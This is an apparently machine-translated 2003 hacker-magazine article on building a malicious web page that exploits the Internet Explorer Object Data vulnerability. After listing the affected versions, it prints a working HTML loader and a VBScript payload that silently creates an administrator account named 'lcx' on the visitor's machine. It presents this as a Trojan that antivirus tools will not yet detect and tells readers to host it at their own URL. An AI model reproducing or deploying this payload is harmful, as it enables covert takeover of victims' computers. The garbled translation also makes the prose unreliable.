Using IE Object Data vulnerability system to do a new Web page Trojan (figure) _ Vulnerability Research

The original hacker x file 8th, the copyright belongs to the magazine all.

Using Internet Explorer Object Data Vulnerability system to make new Web Trojan
Lcx
This August 20, Microsoft unveiled an important vulnerability--internet Explorer Object Data remote execution vulnerability with the highest severity rating. This is a good thing for the Web Trojan enthusiasts, we can use this loophole to make a new and temporarily will not be killed Trojan. In introducing how to make this new Web page before I give you a brief introduction of the vulnerability.
A description of the vulnerability
The flaw was discovered by eeye Digital Security and released on August 20, and Microsoft issued the same same day announcement. On Eeye's website publishing page: http://www.eeye.com/html/Research/Advisories/AD20030820.html This document mentions that Microsoft Internet Explorer is a popular web browsing program, and Internet Explorer does not properly handle the file parameters to be loaded when it handles object tags.
The "Object" tag is used to insert an object such as an ActiveX component into an HTML page. The ' type ' property of the ' object ' tag is used to set or get the MIME type of the object. Usually legitimate MIME types include "Plain/text" or "Application/hta", "Audio/x-mpeg", and so on. Internet Explorer specifies that the parameters of the remote object data location do not adequately check the loaded file attributes, and an attacker can construct a malicious page that will entice a user to run a program that is specified by a malicious page. Windows 2003 Internet Explorer is using "Disable ActiveX" by default because of the use of "enhanced security Configuration mode", so this vulnerability is in Windows 2003 IE level is medium.
This description is very professional, but do not understand the rookie can skip, the direct academic system to do. ：-）
Ii. Affected system versions
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5sp2
Microsoft Internet Explorer 5.5sp1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1sp2
Microsoft Internet Explorer 5.0.1sp1
Microsoft Internet Explorer 6.0sp1
-Microsoft Windows XP
-Microsoft Windows NT 4.0
-Microsoft Windows ME
-Microsoft Windows ses SE
-Microsoft Windows 98
-Microsoft Windows 95
-Microsoft Windows 2003 Web Edition
-Microsoft Windows 2003 Standard Edition
-Microsoft Windows 2003 Enterprise Edition 64-bit
-Microsoft Windows 2003 Enterprise Edition
-Microsoft Windows 2003 Datacenter Edition 64-bit
-Microsoft Windows 2003 Datacenter Edition
-Microsoft Windows 2000
Detailed methods of exploiting vulnerabilities
Based on the http://www.eeye.com/html/Research/Advisories/AD20030820.html of this page, I wrote two simple test pages. Please look at the code and comments first, let me explain.

--------------test.htm Code starts-----------------
<body>
This is a test page, if your system is W2K or XP, Access will add a user name is LCX password is lcxlcx Admin user
<object data= "Http://127.0.0.1/test.test" ></object>
<!--this is to call a malicious page out of the Test.test, I was in the native test, placed in my IIS Manager root directory, so the URL is http://127.0.0.1; If you want to use this code, Please change the URL address of the corresponding network test.test, change http://127.0.0.1/test.test to http://your url/test.test--! >
</body>
------------test.htm code End--------------

The Test.test code written in the--------------test.htm begins------------------
<object id=wsh classid=clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b></object>
<script language=vbscript>
Set Wshshell=createobject ("Wscript.Shell")
A=wshshell.run ("cmd.exe/c net user lcx Lcxlcx/add", 0)
B=wshshell.run ("cmd.exe/c net localgroup Administrators Lcx/add", 0)
' This is plus a user is lcx password is lcxlcx Admin user, this section VBS you should be able to read
</script>
------------test.test code End---------------